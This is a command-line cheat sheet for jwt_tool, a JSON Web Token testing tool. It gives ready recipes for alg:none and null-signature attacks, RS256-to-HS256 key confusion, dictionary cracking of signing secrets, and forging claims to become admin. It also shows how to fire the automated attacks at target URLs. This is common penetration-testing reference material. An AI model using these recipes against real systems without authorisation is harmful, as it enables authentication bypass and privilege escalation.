jwt_tool

JWT (JSON Web Token) toolkit for testing and exploitation.

Quickstart

# Analyze token
jwt_tool <token>

# Test all known attacks
jwt_tool <token> -M at

# Tamper claims
jwt_tool <token> -T

# Crack secret
jwt_tool <token> -C -d wordlist.txt

Core Concepts

Concept	Description
JWT	JSON Web Token (header.payload.signature)
Algorithm	HS256, RS256, none, etc.
Claims	Payload data (sub, exp, iat, etc.)
Attacks	none alg, key confusion, brute force

Syntax

jwt_tool <token> [options]

Options

Analysis

Option	Description
(none)	Analyze token
`-V`	Verbose analysis

Tampering

Option	Description
`-T`	Tamper mode
`-I`	Inject inline claims
`-pc <claim>`	Claim to tamper
`-pv <value>`	New value

Attacks

Option	Description
`-M <mode>`	Attack mode
`-C`	Crack mode
`-d <file>`	Dictionary
`-X <attack>`	Exploit type

Attack Modes (-M)

Mode	Description
`at`	All tests
`pb`	Playbook

Exploits (-X)

Exploit	Description
`a`	alg:none
`n`	null signature
`b`	blank password
`s`	sign with key
`k`	key confusion (RS→HS)
`i`	inject JWKS

Request

Option	Description
`-t <url>`	Target URL
`-rc <cookie>`	Cookie name
`-rh <header>`	Header name

Recipes

Token Analysis

# Basic analysis
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

# Verbose
jwt_tool <token> -V

Tamper Claims

# Interactive tamper
jwt_tool <token> -T

# Change specific claim
jwt_tool <token> -I -pc sub -pv admin

# Change role
jwt_tool <token> -I -pc role -pv admin

# Change user ID
jwt_tool <token> -I -pc user_id -pv 1

Automated Attacks

# All attacks
jwt_tool <token> -M at

# Test and send to target
jwt_tool <token> -M at -t https://target.com/api -rh "Authorization"

Algorithm Attacks

# None algorithm attack
jwt_tool <token> -X a

# Null signature
jwt_tool <token> -X n

# Key confusion (RS256 → HS256)
# Use public key as HMAC secret
jwt_tool <token> -X k -pk public.pem

Crack Secret

# Dictionary attack
jwt_tool <token> -C -d /usr/share/wordlists/rockyou.txt

# With rules
jwt_tool <token> -C -d wordlist.txt

Sign with Known Key

# Sign with secret
jwt_tool <token> -S -p "secret123"

# Sign with key file
jwt_tool <token> -S -pk private.pem

Send to Target

# Test with target URL
jwt_tool <token> -M at -t https://target.com/api/user -rh "Authorization"

# In cookie
jwt_tool <token> -M at -t https://target.com/dashboard -rc "token"

Inject Claims

# Add admin claim
jwt_tool <token> -I -pc admin -pv true

# Change expiry
jwt_tool <token> -I -pc exp -pv 9999999999

# Multiple claims
jwt_tool <token> -I -pc sub -pv admin -pc role -pv superuser

Common JWT Claims

Claim	Description
`sub`	Subject (user ID)
`iss`	Issuer
`aud`	Audience
`exp`	Expiration
`iat`	Issued at
`nbf`	Not before
`jti`	JWT ID
`role`	User role (custom)
`admin`	Admin flag (custom)

Troubleshooting

Issue	Solution
Invalid token	Check token format
Crack failed	Try larger wordlist
Attack blocked	App validates properly

References

← Retour aux cheat sheets